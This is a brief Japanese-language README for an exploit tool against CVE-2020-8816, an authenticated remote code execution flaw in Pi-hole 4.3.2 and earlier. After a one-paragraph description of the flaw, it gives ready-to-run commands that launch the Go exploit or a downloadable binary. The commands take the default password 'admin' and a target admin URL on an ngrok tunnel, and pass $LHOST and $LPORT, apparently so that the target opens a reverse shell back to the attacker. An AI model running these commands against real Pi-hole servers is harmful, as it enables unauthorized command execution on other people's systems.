
Pi-hole ( <= 4.3.2) の認証済みリモートコード実行。
Pi-hole(バージョン <= 4.3.2)は、リモートコード実行(Remote Code Execution)の脆弱性の影響を受けます。Web ポータルの認証済みユーザーは、サービスを実行しているローカルユーザーの権限で、基盤となるサーバー上で任意のコマンドを実行できます。
go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/
またはバイナリ CVE-2020-8816 をダウンロードします :
./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/